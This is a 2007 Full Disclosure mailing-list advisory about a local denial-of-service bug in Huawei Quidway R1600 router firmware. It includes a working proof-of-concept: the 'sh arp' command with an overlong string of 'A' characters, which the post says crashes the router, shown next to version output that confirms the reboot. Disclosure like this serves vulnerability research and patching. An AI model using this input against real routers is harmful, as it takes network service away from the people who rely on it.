Full Disclosure mailing list archives
The Quidway Router local DOS
From: "handrix cobra" <handrix () gmail com>
Date: Thu, 18 Jan 2007 15:51:39 +0100
Quidway Router Local DOS attack By: Handrix <handrix_at_morx_org> 18 January 2007 MorX security research team www.morx.org Description: The Quidway Router's firmware is vulnerable to a local denial of service attack, there are a request to turn off the engine. Simple poc realeased by : Router>sh arp AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\ AAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA After the Router crash, wait a while and type "sh version" to verify this bug: Router>sh ver VRP (tm) software, Version 1.43 2500E-003 Copyright (c) 1997-2002 HUAWEI TECH CO., LTD. Compiled 20:53:47, Nov 7 2002 , Quidway R1600 uptime is 0 days 0 hours 1 minutes 3 seconds. Quidway R1600 with 1 68360 Processor 16 Mbytes DRAM 4608 Kbytes Flash Memory hardware version is 1.0 Vendor: Huawei Vulnerable version: Quidway R1600 (Versatile Routing Platform, version 1.43 2500E-003) Maybe others.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- The Quidway Router local DOS handrix cobra (Jan 18)